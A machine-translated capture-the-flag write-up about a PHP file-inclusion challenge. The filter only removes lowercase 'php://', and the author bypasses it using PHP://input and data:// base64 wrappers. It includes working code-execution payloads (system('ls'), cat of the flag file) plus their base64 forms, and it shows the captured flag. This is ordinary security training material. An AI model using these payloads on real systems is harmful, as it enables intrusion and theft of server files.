Tips ： When the article is finished , Directories can be generated automatically , How to generate it, please refer to the help document on the right

Tools

firefox ,burpsuite

analysis

Code audit ：

strstr(): Case sensitive

str_replace: Substitution function

Add ：

  The function prototype ：mixed str_replace ( mixed $search , mixed $replace , mixed $subject [, int &$count ] ) Parameter description ：$search String to be replaced by search ,$replace The string to replace the search ,$subject String of operations ,&$count Number of replacements , The call function returns in $subject Search for $search Replace with $replace String or array of . In this string of code , take php:// Replace with "", The operation string is $page

Method 1 ： Application php://input

reason ：php://input It's a read-only stream that can access the requested raw data , Want to know more about this recommendation Blog

Because this can access the original data, we use burpsuite Grab its bag , Modify the order , To achieve our purpose

visit PHP://input

  Start the bag.

You can find this package , Input <?php system('ls');?> , This is a php Code ,ls yes linux command

  Query the file name

Input <?php system('cat fl4gisisish3r3.php');?>,cat Command details ：

   obtain flag：$flag="ctf{876a5fca-96c6-4cbd-9075-46f0c89475d2}";

  Method 2 ：data Fake protocol

data agreement

php5.2.0 rise , The data stream wrapper is starting to work , It is mainly used for reading data streams . If the incoming data is PHP Code , Will execute code usage :data://text/plain;base64,xxxx(base64 Encoded data )data Pseudo agreement only exists in php<5.3 And include=on You can write a Trojan horse .

Namely structure data://text/plain;base64,<?php system("ls")?>（base64 Encrypted value ） Note that there ls Use double quotes

namely        data://text/plain;base64,PD9waHAgc3lzdGVtKCJscyIpPz4=

  Get the name and continue to encrypt , Note that many after the name should be deleted

data://text/plain;base64,<?php system("cat fl4gisisish3r3.php")?>

Encrypted data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZmw0Z2lzaXNpc2gzcjMucGhwIik/Pg==

  Found that there is no , Open source code , It should be hidden here , obtain flag

Refer to the connection ;

str_replace Function details _wangchaoqi1985 The blog of -CSDN Blog _str_replace

Attack and defend the world -web Master advanced area _ZJL_19 The blog of -CSDN Blog _ Attack and defend the world web Advanced master